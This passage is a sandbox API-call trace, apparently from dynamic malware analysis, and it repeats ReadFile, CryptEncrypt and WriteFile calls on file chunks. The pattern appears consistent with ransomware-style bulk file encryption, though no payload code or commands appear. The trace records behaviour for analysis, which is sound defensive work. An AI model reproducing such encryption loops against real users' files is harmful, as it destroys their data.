pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.262] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.262] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.262] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.262] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.263] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.263] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.263] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.263] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.263] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.263] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.263] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.263] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.263] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.263] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.263] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.263] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.263] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.264] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.264] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.264] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.264] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.264] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.264] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.264] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.264] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.264] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.264] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.264] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.264] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.264] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.264] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.265] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.265] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.265] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.265] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.265] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.265] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.265] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.265] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.265] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.265] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.265] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.265] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.266] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.266] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.266] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.266] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.266] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.266] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.266] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.266] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.266] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.266] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.266] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.266] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.266] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.267] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.267] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.267] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.267] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.267] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.267] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.267] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.267] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.267] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.267] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.267] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.267] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.267] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.267] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.268] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.268] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.268] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.268] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.268] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.268] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.268] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.268] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.268] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.268] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.268] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.268] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.269] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.269] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.269] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.269] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.269] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.269] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.269] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.269] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.269] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.269] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.269] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.269] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.269] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.270] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.270] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.270] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.270] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.270] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.271] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.271] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.271] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.271] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 